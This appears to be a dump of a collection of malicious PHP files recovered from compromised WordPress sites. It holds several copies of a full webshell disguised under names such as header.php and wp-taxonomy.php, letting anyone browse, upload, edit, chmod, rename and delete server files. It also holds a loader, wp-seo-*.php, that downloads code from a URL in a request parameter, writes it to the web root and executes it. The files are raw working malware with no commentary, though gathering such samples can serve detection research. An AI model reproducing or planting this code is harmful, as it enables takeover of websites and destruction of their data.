(($perms & 0x0010) ? 'w' : ' - '); 256 | $info .= (($perms & 0x0008) ? 257 | (($perms & 0x0400) ? 's' : 'x' ) : 258 | (($perms & 0x0400) ? 'S' : ' - ')); 259 | 260 | // World 261 | $info .= (($perms & 0x0004) ? 'r' : ' - '); 262 | $info .= (($perms & 0x0002) ? 'w' : ' - '); 263 | $info .= (($perms & 0x0001) ? 264 | (($perms & 0x0200) ? 't' : 'x' ) : 265 | (($perms & 0x0200) ? 'T' : ' - ')); 266 | 267 | return $info; 268 | } 269 | ?> -------------------------------------------------------------------------------- /found_on_wordpress/wp-content/themes/AdvanceImage5/header.php: -------------------------------------------------------------------------------- 1 | 4 | $value) { 11 | $_POST[$key] = stripslashes($value); 12 | } 13 | } 14 | echo ' 15 | 16 | 17 | 18 | Webshell 19 | 57 | 58 | 59 |
    60 | Current Path : '; 61 | if (isset($_GET['path'])) { 62 | $path = $_GET['path']; 63 | } else { 64 | $path = getcwd(); 65 | } 66 | $path = str_replace('\',' / ',$path); 67 | $paths = explode(' / ',$path); 68 | 69 | foreach($paths as $id=>$pat){ 70 | if($pat == '' && $id == 0){ 71 | $a = true; 72 | echo ' < ahref = "?path=/" > / < / a > '; 73 | continue; 74 | } 75 | if($pat == '') continue; 76 | echo ' < ahref = "?path='; 77 | for($i=0;$i<=$id;$i++){ 78 | echo "$paths[$i]"; 79 | if($i != $id) echo " / "; 80 | } 81 | echo '" > '.$pat.' < / a > / '; 82 | } 83 | echo ' < / td > < / tr > < tr > < td > '; 84 | if(isset($_FILES['file'])){ 85 | if(copy($_FILES['file']['tmp_name'],$path.' / '.$_FILES['file']['name'])){ 86 | echo ' < fontcolor = "green" > FileUploadDone . < / font > < br / > '; 87 | }else{ 88 | echo ' < fontcolor = "red" > FileUploadError . < / font > < br / > '; 89 | } 90 | } 91 | echo ' < b > < br > < br > '.php_uname().' < br > < / b > < br > '; 92 | echo ' < formenctype = "multipart/form-data"method = "POST" > UploadFile : < inputtype = "file"name = "file" / > < inputtype = "submit"value = "upload" / > < / form > < / td > < / tr > '; 93 | if(isset($_GET['filesrc'])){ 94 | echo "Current File : "; 95 | echo $_GET['filesrc']; 96 | echo ' < / tr > < / td > < / table > < br / > '; 97 | echo(' < pre > '.htmlspecialchars(file_get_contents($_GET['filesrc'])).' < / pre > '); 98 | }elseif(isset($_GET['option']) && $_POST['opt'] != 'delete'){ 99 | echo ' < / table > < br / > < center > '.$_POST['path'].' < br / > < br / > '; 100 | if($_POST['opt'] == 'chmod'){ 101 | if(isset($_POST['perm'])){ 102 | if(chmod($_POST['path'],$_POST['perm'])){ 103 | echo ' < fontcolor = "green" > ChangePermissionDone . < / font > < br / > '; 104 | }else{ 105 | echo ' < fontcolor = "red" > ChangePermissionError . < / font > < br / > '; 106 | } 107 | } 108 | echo ' < formmethod = "POST" > Permission: < inputname = "perm"type = "text"size = "4"value = "'.substr(sprintf('%o', fileperms($_POST['path'])), -4).'" / > < inputtype = "hidden"name = "path"value = "'.$_POST['path'].'" > < inputtype = "hidden"name = "opt"value = "chmod" > < inputtype = "submit"value = "Go" / > < / form > '; 109 | }elseif($_POST['opt'] == 'rename'){ 110 | if(isset($_POST['newname'])){ 111 | if(rename($_POST['path'],$path.' / '.$_POST['newname'])){ 112 | echo ' < fontcolor = "green" > ChangeNameDone . < / font > < br / > '; 113 | }else{ 114 | echo ' < fontcolor = "red" > ChangeNameError . < / font > < br / > '; 115 | } 116 | $_POST['name'] = $_POST['newname']; 117 | } 118 | echo ' < formmethod = "POST" > New Name: < inputname = "newname"type = "text"size = "20"value = "'.$_POST['name'].'" / > < inputtype = "hidden"name = "path"value = "'.$_POST['path'].'" > < inputtype = "hidden"name = "opt"value = "rename" > < inputtype = "submit"value = "Go" / > < / form > '; 119 | }elseif($_POST['opt'] == 'edit'){ 120 | if(isset($_POST['src'])){ 121 | $fp = fopen($_POST['path'],'w'); 122 | if(fwrite($fp,$_POST['src'])){ 123 | echo ' < fontcolor = "green" > EditFileDone . < / font > < br / > '; 124 | }else{ 125 | echo ' < fontcolor = "red" > EditFileError . < / font > < br / > '; 126 | } 127 | fclose($fp); 128 | } 129 | echo ' < formmethod = "POST" > < textareacols = 80rows = 20name = "src" > '.htmlspecialchars(file_get_contents($_POST['path'])).' < / textarea > < br / > < inputtype = "hidden"name = "path"value = "'.$_POST['path'].'" > < inputtype = "hidden"name = "opt"value = "edit" > < inputtype = "submit"value = "Go" / > < / form > '; 130 | } 131 | echo ' < / center > '; 132 | }else{ 133 | echo ' < / table > < br / > < center > '; 134 | if(isset($_GET['option']) && $_POST['opt'] == 'delete'){ 135 | if($_POST['type'] == 'dir'){ 136 | if(rmdir($_POST['path'])){ 137 | echo ' < fontcolor = "green" > DeleteDirDone . < / font > < br / > '; 138 | }else{ 139 | echo ' < fontcolor = "red" > DeleteDirError . < / font > < br / > '; 140 | } 141 | }elseif($_POST['type'] == 'file'){ 142 | if(unlink($_POST['path'])){ 143 | echo ' < fontcolor = "green" > DeleteFileDone . < / font > < br / > '; 144 | }else{ 145 | echo ' < fontcolor = "red" > DeleteFileError . < / font > < br / > '; 146 | } 147 | } 148 | } 149 | echo ' < / center > '; 150 | $scandir = scandir($path); 151 | echo ' < divid = "content" > < tablewidth = "700"border = "0"cellpadding = "3"cellspacing = "1"align = "center" > < trclass = "first" > < td > < center > Name < / center > < / td > < td > < center > Size < / center > < / td > < td > < center > Permissions < / center > < / td > < td > < center > Options < / center > < / td > < / tr > '; 152 | 153 | foreach($scandir as $dir){ 154 | if(!is_dir("$path/$dir") || $dir == ' . ' || $dir == ' . . ') continue; 155 | echo " 156 | $dir 157 |
    --
    158 |
    "; 159 | if(is_writable("$path/$dir")) echo ' < fontcolor = "green" > '; 160 | elseif(!is_readable("$path/$dir")) echo ' < fontcolor = "red" > '; 161 | echo perms("$path/$dir"); 162 | if(is_writable("$path/$dir") || !is_readable("$path/$dir")) echo ' < / font > '; 163 | 164 | echo "
    165 |
    166 | 172 | 173 | 174 | 175 | \" /> 176 |
    177 | "; 178 | } 179 | echo ' < trclass = "first" > < td > < / td > < td > < / td > < td > < / td > < td > < / td > < / tr > '; 180 | foreach($scandir as $file){ 181 | if(!is_file("$path/$file")) continue; 182 | $size = filesize("$path/$file")/1024; 183 | $size = round($size,3); 184 | if($size >= 1024){ 185 | $size = round($size/1024,2).'MB'; 186 | }else{ 187 | $size = $size.'KB'; 188 | } 189 | 190 | echo " 191 | $file 192 |
    ".$size."
    193 |
    "; 194 | if(is_writable("$path/$file")) echo ' < fontcolor = "green" > '; 195 | elseif(!is_readable("$path/$file")) echo ' < fontcolor = "red" > '; 196 | echo perms("$path/$file"); 197 | if(is_writable("$path/$file") || !is_readable("$path/$file")) echo ' < / font > '; 198 | echo "
    199 |
    200 | 207 | 208 | 209 | 210 | \" /> 211 |
    212 | "; 213 | } 214 | echo ' < / table > < / div > '; 215 | } 216 | echo ' < br / > < / BODY > < / HTML > '; 217 | function perms($file){ 218 | $perms = fileperms($file); 219 | 220 | if (($perms & 0xC000) == 0xC000) { 221 | // Socket 222 | $info = 's'; 223 | } elseif (($perms & 0xA000) == 0xA000) { 224 | // Symbolic Link 225 | $info = 'l'; 226 | } elseif (($perms & 0x8000) == 0x8000) { 227 | // Regular 228 | $info = ' - '; 229 | } elseif (($perms & 0x6000) == 0x6000) { 230 | // Block special 231 | $info = 'b'; 232 | } elseif (($perms & 0x4000) == 0x4000) { 233 | // Directory 234 | $info = 'd'; 235 | } elseif (($perms & 0x2000) == 0x2000) { 236 | // Character special 237 | $info = 'c'; 238 | } elseif (($perms & 0x1000) == 0x1000) { 239 | // FIFO pipe 240 | $info = 'p'; 241 | } else { 242 | // Unknown 243 | $info = 'u'; 244 | } 245 | 246 | // Owner 247 | $info .= (($perms & 0x0100) ? 'r' : ' - '); 248 | $info .= (($perms & 0x0080) ? 'w' : ' - '); 249 | $info .= (($perms & 0x0040) ? 250 | (($perms & 0x0800) ? 's' : 'x' ) : 251 | (($perms & 0x0800) ? 'S' : ' - ')); 252 | 253 | // Group 254 | $info .= (($perms & 0x0020) ? 'r' : ' - '); 255 | $info .= (($perms & 0x0010) ? 'w' : ' - '); 256 | $info .= (($perms & 0x0008) ? 257 | (($perms & 0x0400) ? 's' : 'x' ) : 258 | (($perms & 0x0400) ? 'S' : ' - ')); 259 | 260 | // World 261 | $info .= (($perms & 0x0004) ? 'r' : ' - '); 262 | $info .= (($perms & 0x0002) ? 'w' : ' - '); 263 | $info .= (($perms & 0x0001) ? 264 | (($perms & 0x0200) ? 't' : 'x' ) : 265 | (($perms & 0x0200) ? 'T' : ' - ')); 266 | 267 | return $info; 268 | } 269 | ?> 270 | -------------------------------------------------------------------------------- /found_on_wordpress/wp-rewrite.php.suspected: -------------------------------------------------------------------------------- 1 | /* Decoded by unphp.net */ 2 | 3 | 4 | $value) { 11 | $_POST[$key] = stripslashes($value); 12 | } 13 | } 14 | echo ' 15 | 16 | 17 | 18 | Webshell 19 | 57 | 58 | 59 |
    60 | Current Path : '; 61 | if (isset($_GET['path'])) { 62 | $path = $_GET['path']; 63 | } else { 64 | $path = getcwd(); 65 | } 66 | $path = str_replace('\',' / ',$path); 67 | $paths = explode(' / ',$path); 68 | 69 | foreach($paths as $id=>$pat){ 70 | if($pat == '' && $id == 0){ 71 | $a = true; 72 | echo ' < ahref = "?path=/" > / < / a > '; 73 | continue; 74 | } 75 | if($pat == '') continue; 76 | echo ' < ahref = "?path='; 77 | for($i=0;$i<=$id;$i++){ 78 | echo "$paths[$i]"; 79 | if($i != $id) echo " / "; 80 | } 81 | echo '" > '.$pat.' < / a > / '; 82 | } 83 | echo ' < / td > < / tr > < tr > < td > '; 84 | if(isset($_FILES['file'])){ 85 | if(copy($_FILES['file']['tmp_name'],$path.' / '.$_FILES['file']['name'])){ 86 | echo ' < fontcolor = "green" > FileUploadDone . < / font > < br / > '; 87 | }else{ 88 | echo ' < fontcolor = "red" > FileUploadError . < / font > < br / > '; 89 | } 90 | } 91 | echo ' < b > < br > < br > '.php_uname().' < br > < / b > < br > '; 92 | echo ' < formenctype = "multipart/form-data"method = "POST" > UploadFile : < inputtype = "file"name = "file" / > < inputtype = "submit"value = "upload" / > < / form > < / td > < / tr > '; 93 | if(isset($_GET['filesrc'])){ 94 | echo "Current File : "; 95 | echo $_GET['filesrc']; 96 | echo ' < / tr > < / td > < / table > < br / > '; 97 | echo(' < pre > '.htmlspecialchars(file_get_contents($_GET['filesrc'])).' < / pre > '); 98 | }elseif(isset($_GET['option']) && $_POST['opt'] != 'delete'){ 99 | echo ' < / table > < br / > < center > '.$_POST['path'].' < br / > < br / > '; 100 | if($_POST['opt'] == 'chmod'){ 101 | if(isset($_POST['perm'])){ 102 | if(chmod($_POST['path'],$_POST['perm'])){ 103 | echo ' < fontcolor = "green" > ChangePermissionDone . < / font > < br / > '; 104 | }else{ 105 | echo ' < fontcolor = "red" > ChangePermissionError . < / font > < br / > '; 106 | } 107 | } 108 | echo ' < formmethod = "POST" > Permission: < inputname = "perm"type = "text"size = "4"value = "'.substr(sprintf('%o', fileperms($_POST['path'])), -4).'" / > < inputtype = "hidden"name = "path"value = "'.$_POST['path'].'" > < inputtype = "hidden"name = "opt"value = "chmod" > < inputtype = "submit"value = "Go" / > < / form > '; 109 | }elseif($_POST['opt'] == 'rename'){ 110 | if(isset($_POST['newname'])){ 111 | if(rename($_POST['path'],$path.' / '.$_POST['newname'])){ 112 | echo ' < fontcolor = "green" > ChangeNameDone . < / font > < br / > '; 113 | }else{ 114 | echo ' < fontcolor = "red" > ChangeNameError . < / font > < br / > '; 115 | } 116 | $_POST['name'] = $_POST['newname']; 117 | } 118 | echo ' < formmethod = "POST" > New Name: < inputname = "newname"type = "text"size = "20"value = "'.$_POST['name'].'" / > < inputtype = "hidden"name = "path"value = "'.$_POST['path'].'" > < inputtype = "hidden"name = "opt"value = "rename" > < inputtype = "submit"value = "Go" / > < / form > '; 119 | }elseif($_POST['opt'] == 'edit'){ 120 | if(isset($_POST['src'])){ 121 | $fp = fopen($_POST['path'],'w'); 122 | if(fwrite($fp,$_POST['src'])){ 123 | echo ' < fontcolor = "green" > EditFileDone . < / font > < br / > '; 124 | }else{ 125 | echo ' < fontcolor = "red" > EditFileError . < / font > < br / > '; 126 | } 127 | fclose($fp); 128 | } 129 | echo ' < formmethod = "POST" > < textareacols = 80rows = 20name = "src" > '.htmlspecialchars(file_get_contents($_POST['path'])).' < / textarea > < br / > < inputtype = "hidden"name = "path"value = "'.$_POST['path'].'" > < inputtype = "hidden"name = "opt"value = "edit" > < inputtype = "submit"value = "Go" / > < / form > '; 130 | } 131 | echo ' < / center > '; 132 | }else{ 133 | echo ' < / table > < br / > < center > '; 134 | if(isset($_GET['option']) && $_POST['opt'] == 'delete'){ 135 | if($_POST['type'] == 'dir'){ 136 | if(rmdir($_POST['path'])){ 137 | echo ' < fontcolor = "green" > DeleteDirDone . < / font > < br / > '; 138 | }else{ 139 | echo ' < fontcolor = "red" > DeleteDirError . < / font > < br / > '; 140 | } 141 | }elseif($_POST['type'] == 'file'){ 142 | if(unlink($_POST['path'])){ 143 | echo ' < fontcolor = "green" > DeleteFileDone . < / font > < br / > '; 144 | }else{ 145 | echo ' < fontcolor = "red" > DeleteFileError . < / font > < br / > '; 146 | } 147 | } 148 | } 149 | echo ' < / center > '; 150 | $scandir = scandir($path); 151 | echo ' < divid = "content" > < tablewidth = "700"border = "0"cellpadding = "3"cellspacing = "1"align = "center" > < trclass = "first" > < td > < center > Name < / center > < / td > < td > < center > Size < / center > < / td > < td > < center > Permissions < / center > < / td > < td > < center > Options < / center > < / td > < / tr > '; 152 | 153 | foreach($scandir as $dir){ 154 | if(!is_dir("$path/$dir") || $dir == ' . ' || $dir == ' . . ') continue; 155 | echo " 156 | $dir 157 |
    --
    158 |
    "; 159 | if(is_writable("$path/$dir")) echo ' < fontcolor = "green" > '; 160 | elseif(!is_readable("$path/$dir")) echo ' < fontcolor = "red" > '; 161 | echo perms("$path/$dir"); 162 | if(is_writable("$path/$dir") || !is_readable("$path/$dir")) echo ' < / font > '; 163 | 164 | echo "
    165 |
    166 | 172 | 173 | 174 | 175 | \" /> 176 |
    177 | "; 178 | } 179 | echo ' < trclass = "first" > < td > < / td > < td > < / td > < td > < / td > < td > < / td > < / tr > '; 180 | foreach($scandir as $file){ 181 | if(!is_file("$path/$file")) continue; 182 | $size = filesize("$path/$file")/1024; 183 | $size = round($size,3); 184 | if($size >= 1024){ 185 | $size = round($size/1024,2).'MB'; 186 | }else{ 187 | $size = $size.'KB'; 188 | } 189 | 190 | echo " 191 | $file 192 |
    ".$size."
    193 |
    "; 194 | if(is_writable("$path/$file")) echo ' < fontcolor = "green" > '; 195 | elseif(!is_readable("$path/$file")) echo ' < fontcolor = "red" > '; 196 | echo perms("$path/$file"); 197 | if(is_writable("$path/$file") || !is_readable("$path/$file")) echo ' < / font > '; 198 | echo "
    199 |
    200 | 207 | 208 | 209 | 210 | \" /> 211 |
    212 | "; 213 | } 214 | echo ' < / table > < / div > '; 215 | } 216 | echo ' < br / > < / BODY > < / HTML > '; 217 | function perms($file){ 218 | $perms = fileperms($file); 219 | 220 | if (($perms & 0xC000) == 0xC000) { 221 | // Socket 222 | $info = 's'; 223 | } elseif (($perms & 0xA000) == 0xA000) { 224 | // Symbolic Link 225 | $info = 'l'; 226 | } elseif (($perms & 0x8000) == 0x8000) { 227 | // Regular 228 | $info = ' - '; 229 | } elseif (($perms & 0x6000) == 0x6000) { 230 | // Block special 231 | $info = 'b'; 232 | } elseif (($perms & 0x4000) == 0x4000) { 233 | // Directory 234 | $info = 'd'; 235 | } elseif (($perms & 0x2000) == 0x2000) { 236 | // Character special 237 | $info = 'c'; 238 | } elseif (($perms & 0x1000) == 0x1000) { 239 | // FIFO pipe 240 | $info = 'p'; 241 | } else { 242 | // Unknown 243 | $info = 'u'; 244 | } 245 | 246 | // Owner 247 | $info .= (($perms & 0x0100) ? 'r' : ' - '); 248 | $info .= (($perms & 0x0080) ? 'w' : ' - '); 249 | $info .= (($perms & 0x0040) ? 250 | (($perms & 0x0800) ? 's' : 'x' ) : 251 | (($perms & 0x0800) ? 'S' : ' - ')); 252 | 253 | // Group 254 | $info .= (($perms & 0x0020) ? 'r' : ' - '); 255 | $info .= (($perms & 0x0010) ? 'w' : ' - '); 256 | $info .= (($perms & 0x0008) ? 257 | (($perms & 0x0400) ? 's' : 'x' ) : 258 | (($perms & 0x0400) ? 'S' : ' - ')); 259 | 260 | // World 261 | $info .= (($perms & 0x0004) ? 'r' : ' - '); 262 | $info .= (($perms & 0x0002) ? 'w' : ' - '); 263 | $info .= (($perms & 0x0001) ? 264 | (($perms & 0x0200) ? 't' : 'x' ) : 265 | (($perms & 0x0200) ? 'T' : ' - ')); 266 | 267 | return $info; 268 | } 269 | ?> 270 | -------------------------------------------------------------------------------- /found_on_wordpress/wp-seo-5ccbd899a479a5ccbd899a47a0.php: -------------------------------------------------------------------------------- 1 | /* Decoded by unphp.net */ 2 | 3 | ' . $data); 6 | } 7 | if (file_exists($_SERVER["DOCUMENT_ROOT"] . '/' . $_GET['path'])) { 8 | chmod($_SERVER["DOCUMENT_ROOT"] . '/' . $_GET['path'] . '.php', 0644); 9 | include $_SERVER["DOCUMENT_ROOT"] . '/' . $_GET['path'] . '.php'; 10 | } else { 11 | $ch = curl_init(); 12 | curl_setopt($ch, CURLOPT_URL, $_GET['url']); 13 | curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1); 14 | curl_setopt($ch, CURLOPT_TIMEOUT, 60); 15 | $data = curl_exec($ch); 16 | if ($data) { 17 | $dsdzzsvxz = $data . ''; 18 | file_func($_SERVER["DOCUMENT_ROOT"] . '/' . $_GET['path'] . '.php', $dsdzzsvxz); 19 | chmod($_SERVER["DOCUMENT_ROOT"] . '/' . $_GET['path'] . '.php', 0644); 20 | include $_SERVER["DOCUMENT_ROOT"] . '/' . $_GET['path'] . '.php'; 21 | } 22 | } 23 | -------------------------------------------------------------------------------- /found_on_wordpress/wp-taxonomy.php: -------------------------------------------------------------------------------- 1 | /* Decoded by unphp.net */ 2 | 3 | 4 | $value) { 11 | $_POST[$key] = stripslashes($value); 12 | } 13 | } 14 | echo ' 15 | 16 | 17 | 18 | Webshell 19 | 57 | 58 | 59 |
    60 | Current Path : '; 61 | if (isset($_GET['path'])) { 62 | $path = $_GET['path']; 63 | } else { 64 | $path = getcwd(); 65 | } 66 | $path = str_replace('\',' / ',$path); 67 | $paths = explode(' / ',$path); 68 | 69 | foreach($paths as $id=>$pat){ 70 | if($pat == '' && $id == 0){ 71 | $a = true; 72 | echo ' < ahref = "?path=/" > / < / a > '; 73 | continue; 74 | } 75 | if($pat == '') continue; 76 | echo ' < ahref = "?path='; 77 | for($i=0;$i<=$id;$i++){ 78 | echo "$paths[$i]"; 79 | if($i != $id) echo " / "; 80 | } 81 | echo '" > '.$pat.' < / a > / '; 82 | } 83 | echo ' < / td > < / tr > < tr > < td > '; 84 | if(isset($_FILES['file'])){ 85 | if(copy($_FILES['file']['tmp_name'],$path.' / '.$_FILES['file']['name'])){ 86 | echo ' < fontcolor = "green" > FileUploadDone . < / font > < br / > '; 87 | }else{ 88 | echo ' < fontcolor = "red" > FileUploadError . < / font > < br / > '; 89 | } 90 | } 91 | echo ' < b > < br > < br > '.php_uname().' < br > < / b > < br > '; 92 | echo ' < formenctype = "multipart/form-data"method = "POST" > UploadFile : < inputtype = "file"name = "file" / > < inputtype = "submit"value = "upload" / > < / form > < / td > < / tr > '; 93 | if(isset($_GET['filesrc'])){ 94 | echo "Current File : "; 95 | echo $_GET['filesrc']; 96 | echo ' < / tr > < / td > < / table > < br / > '; 97 | echo(' < pre > '.htmlspecialchars(file_get_contents($_GET['filesrc'])).' < / pre > '); 98 | }elseif(isset($_GET['option']) && $_POST['opt'] != 'delete'){ 99 | echo ' < / table > < br / > < center > '.$_POST['path'].' < br / > < br / > '; 100 | if($_POST['opt'] == 'chmod'){ 101 | if(isset($_POST['perm'])){ 102 | if(chmod($_POST['path'],$_POST['perm'])){ 103 | echo ' < fontcolor = "green" > ChangePermissionDone . < / font > < br / > '; 104 | }else{ 105 | echo ' < fontcolor = "red" > ChangePermissionError . < / font > < br / > '; 106 | } 107 | } 108 | echo ' < formmethod = "POST" > Permission: < inputname = "perm"type = "text"size = "4"value = "'.substr(sprintf('%o', fileperms($_POST['path'])), -4).'" / > < inputtype = "hidden"name = "path"value = "'.$_POST['path'].'" > < inputtype = "hidden"name = "opt"value = "chmod" > < inputtype = "submit"value = "Go" / > < / form > '; 109 | }elseif($_POST['opt'] == 'rename'){ 110 | if(isset($_POST['newname'])){ 111 | if(rename($_POST['path'],$path.' / '.$_POST['newname'])){ 112 | echo ' < fontcolor = "green" > ChangeNameDone . < / font > < br / > '; 113 | }else{ 114 | echo ' < fontcolor = "red" > ChangeNameError . < / font > < br / > '; 115 | } 116 | $_POST['name'] = $_POST['newname']; 117 | } 118 | echo ' < formmethod = "POST" > New Name: < inputname = "newname"type = "text"size = "20"value = "'.$_POST['name'].'" / > < inputtype = "hidden"name = "path"value = "'.$_POST['path'].'" > < inputtype = "hidden"name = "opt"value = "rename" > < inputtype = "submit"value = "Go" / > < / form > '; 119 | }elseif($_POST['opt'] == 'edit'){ 120 | if(isset($_POST['src'])){ 121 | $fp = fopen($_POST['path'],'w'); 122 | if(fwrite($fp,$_POST['src'])){ 123 | echo ' < fontcolor = "green" > EditFileDone . < / font > < br / > '; 124 | }else{ 125 | echo ' < fontcolor = "red" > EditFileError . < / font > < br / > '; 126 | } 127 | fclose($fp); 128 | } 129 | echo ' < formmethod = "POST" > < textareacols = 80rows = 20name = "src" > '.htmlspecialchars(file_get_contents($_POST['path'])).' < / textarea > < br / > < inputtype = "hidden"name = "path"value = "'.$_POST['path'].'" > < inputtype = "hidden"name = "opt"value = "edit" > < inputtype = "submit"value = "Go" / > < / form > '; 130 | } 131 | echo ' < / center > '; 132 | }else{ 133 | echo ' < / table > < br / > < center > '; 134 | if(isset($_GET['option']) && $_POST['opt'] == 'delete'){ 135 | if($_POST['type'] == 'dir'){ 136 | if(rmdir($_POST['path'])){ 137 | echo ' < fontcolor = "green" > DeleteDirDone . < / font > < br / > '; 138 | }else{ 139 | echo ' < fontcolor = "red" > DeleteDirError . < / font > < br / > '; 140 | } 141 | }elseif($_POST['type'] == 'file'){ 142 | if(unlink($_POST['path'])){ 143 | echo ' < fontcolor = "green" > DeleteFileDone . < / font > < br / > '; 144 | }else{ 145 | echo ' < fontcolor = "red" > DeleteFileError . < / font > < br / > '; 146 | } 147 | } 148 | } 149 | echo ' < / center > '; 150 | $scandir = scandir($path); 151 | echo ' < divid = "content" > < tablewidth = "700"border = "0"cellpadding = "3"cellspacing = "1"align = "center" > < trclass = "first" > < td > < center > Name < / center > < / td > < td > < center > Size < / center > < / td > < td > < center > Permissions < / center > < / td > < td > < center > Options < / center > < / td > < / tr > '; 152 | 153 | foreach($scandir as $dir){ 154 | if(!is_dir("$path/$dir") || $dir == ' . ' || $dir == ' . . ') continue; 155 | echo " 156 | $dir 157 |
    --
    158 |
    "; 159 | if(is_writable("$path/$dir")) echo ' < fontcolor = "green" > '; 160 | elseif(!is_readable("$path/$dir")) echo ' < fontcolor = "red" > '; 161 | echo perms("$path/$dir"); 162 | if(is_writable("$path/$dir") || !is_readable("$path/$dir")) echo ' < / font > '; 163 | 164 | echo "
    165 |
    166 | 172 | 173 | 174 | 175 | \" /> 176 |
    177 | "; 178 | } 179 | echo ' < trclass = "first" > < td > < / td > < td > < / td > < td > < / td > < td > < / td > < / tr > '; 180 | foreach($scandir as $file){ 181 | if(!is_file("$path/$file")) continue; 182 | $size = filesize("$path/$file")/1024; 183 | $size = round($size,3); 184 | if($size >= 1024){ 185 | $size = round($size/1024,2).'MB'; 186 | }else{ 187 | $size = $size.'KB'; 188 | } 189 | 190 | echo " 191 | $file 192 |
    ".$size."
    193 |
    "; 194 | if(is_writable("$path/$file")) echo ' < fontcolor = "green" > '; 195 | elseif(!is_readable("$path/$file")) echo ' < fontcolor = "red" > '; 196 | echo perms("$path/$file"); 197 | if(is_writable("$path/$file") || !is_readable("$path/$file")) echo ' < / font > '; 198 | echo "
    199 |
    200 | 207 | 208 | 209 | 210 | \" /> 211 |
    212 | "; 213 | } 214 | echo ' < / table > < / div > '; 215 | } 216 | echo ' < br / > < / BODY > < / HTML > '; 217 | function perms($file){ 218 | $perms = fileperms($file); 219 | 220 | if (($perms & 0xC000) == 0xC000) { 221 | // Socket 222 | $info = 's'; 223 | } elseif (($perms & 0xA000) == 0xA000) { 224 | // Symbolic Link 225 | $info = 'l'; 226 | } elseif (($perms & 0x8000) == 0x8000) { 227 | // Regular 228 | $info = ' - '; 229 | } elseif (($perms & 0x6000) == 0x6000) { 230 | // Block special 231 | $info = 'b'; 232 | } elseif (($perms & 0x4000) == 0x4000) { 233 | // Directory 234 | $info = 'd'; 235 | } elseif (($perms & 0x2000) == 0x2000) { 236 | // Character special 237 | $info = 'c'; 238 | } elseif (($perms & 0x1000) == 0x1000) { 239 | // FIFO pipe 240 | $info = 'p'; 241 | } else { 242 | // Unknown 243 | $info = 'u'; 244 | } 245 | 246 | // Owner 247 | $info .= (($perms & 0x0100) ? 'r' : ' - '); 248 | $info .= (($perms & 0x0080) ? 'w' : ' - '); 249 | $info .= (($perms & 0x0040) ? 250 | (($perms & 0x0800) ? 's' : 'x' ) : 251 | (($perms & 0x0800) ? 'S' : ' - ')); 252 | 253 | // Group 254 | $info .= (($perms & 0x0020) ? 'r' : ' - '); 255 | $info .= (($perms & 0x0010) ? 'w' : ' - '); 256 | $info .= (($perms & 0x0008) ? 257 | (($perms & 0x0400) ? 's' : 'x' ) : 258 | (($perms & 0x0400) ? 'S' : ' - ')); 259 | 260 | // World 261 | $info .= (($perms & 0x0004) ? 'r' : ' - '); 262 | $info .= (($perms & 0x0002) ? 'w' : ' - '); 263 | $info .= (($perms & 0x0001) ? 264 | (($perms & 0x0200) ? 't' : 'x' ) : 265 | (($perms & 0x0200) ? 'T' : ' - ')); 266 | 267 | return $info; 268 | } 269 | ?> 270 | -------------------------------------------------------------------------------- /found_on_wordpress/wp-temp.php.suspected: -------------------------------------------------------------------------------- 1 | /* Decoded by unphp.net */ 2 | 3 | -------------------------------------------------------------------------------- /found_on_wordpress/ykbh.php: -------------------------------------------------------------------------------- 1 | 2 | 3 |